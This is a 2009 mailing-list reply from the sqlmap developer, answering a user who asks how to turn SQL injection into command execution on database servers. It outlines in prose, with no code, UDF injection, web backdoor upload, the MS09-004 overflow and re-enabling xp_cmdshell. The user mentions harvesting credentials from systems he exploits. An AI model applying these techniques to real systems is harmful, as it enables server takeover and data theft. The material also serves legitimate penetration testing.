Re: [sqlmap-users] post exploitation
Brought to you by:
inquisb
From: Bernardo D. A. G. <ber...@gm...> - 2009-12-22 12:02:14
|
Hi Wullie, On Mon, Dec 21, 2009 at 23:30, wullie millen <wul...@go...> wrote: > ... > First off I just want to say thanks such a great tool and really appreciate > all the hard > work that you put into the project. Thanks. > When ever I use this to exploit a system, I usually get > user names and passwords and all kinds of other which can come in handy. > What I would > really like to know is how to get command execution on a server that does > not support > batched queries? Please forgive me for being a noob to webapp security but > in mysql I know > there is the UDF's you have created but what is the present requirements to > use these? I have > had read and write access but still no shell have even been dba on a mssql > system but still > no shell are these limitations of the tool or could this be something to do > with the paths Im > asked for? Also is there any way I can get command execution on a system > with only read > access? I have heard this is possible via log poisening does anyone have any > pointers on this. UDF injection to command execution can be achieved when the database user has high privileges on PostgreSQL and FILE privileges on MySQL. Also, it's required that the front-end web application supports batched queries (all do for PostgreSQL, ASP.NET does for MySQL). When this requirement is not in place there are still ways to command execute, like uploading a web backdoor within a writable folder in the web server document root (this is implemented for MySQL running on PHP/ASP in sqlmap, a bit buggy though) and still requires the database user to have FILE privilege. On Microsoft SQL Server you need to privilege escalate (via OPENROWSET on MSSQL 7.0 and 2000), exploit a buffer overflow (MS09-004, it does not require ANY privilege to the database user, sqlmap can do it) or abuse xp_cmdshell stored procedure (requires high privileged and is usually disabled on MSSQL 2005/2008, but can be easily re-enabled/created if you've DBA privileges). An in-depth walk-through these and other techniques can be found on the following links: * http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf * http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides * http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database Cheers, -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |